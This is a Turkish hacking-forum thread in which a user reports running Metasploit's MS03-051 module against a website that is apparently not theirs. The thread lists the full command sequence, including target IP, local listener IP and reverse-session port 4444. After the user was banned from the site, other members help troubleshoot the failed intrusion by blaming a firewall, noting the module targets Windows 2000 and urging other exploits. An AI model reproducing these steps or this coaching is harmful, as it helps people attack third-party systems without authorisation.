Metasploit kullanımı

NoBodyAnonym4Me

Yeni üye
8 Kas 2021
16
1
23
metasploit kullanırken açığın kesin olduğu bi sitede denemeyi düşündüm bu açık MS03-051 diye geçiyordu araçla saldırı yapmaya çalışırken
exploit started but no sessions was created hatası aldım yaptığım her şey tamdı girdiğim şeyler bunlar
search ms03 use 6 (ms03-051 olan) (kali 2021 4a ile denedim) show options set RHOST (karşı ip) set RPORT (karşı ipnin vulneralibity'si olan portu) set LHOST (benim ip) set LPORT 4444 show targets set target 0 exploit -j
bunu yaptıktan sonra siteden banlandım yani exploit doğru açık var ama ben sızamıyorum

misting

Üye
12 Eki 2019
75
11
Neptün
Sistemde güvenlik duvarı olduğundan dolayı erişim sağlayamamışsın büyük ihtimalle. Şuan araştırıyorum eğer bir kaynak bulursam bırakacam buraya

misting

Üye
12 Eki 2019
75
11
Neptün
Dostum senin sorunu sanırım buldum. Sebebi şey olabilir seçtiğin exploit hatalı olabilir. Bu use 6 'da olan exploit windows2000 sürümleri için geçerli. Metasploitteki diğer exploitleride denemeni tavsiye ediyorum.

misting

Üye
12 Eki 2019
75
11
Neptün
kaynakta

burdanda manuel olarak yararlanabilirsin.

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.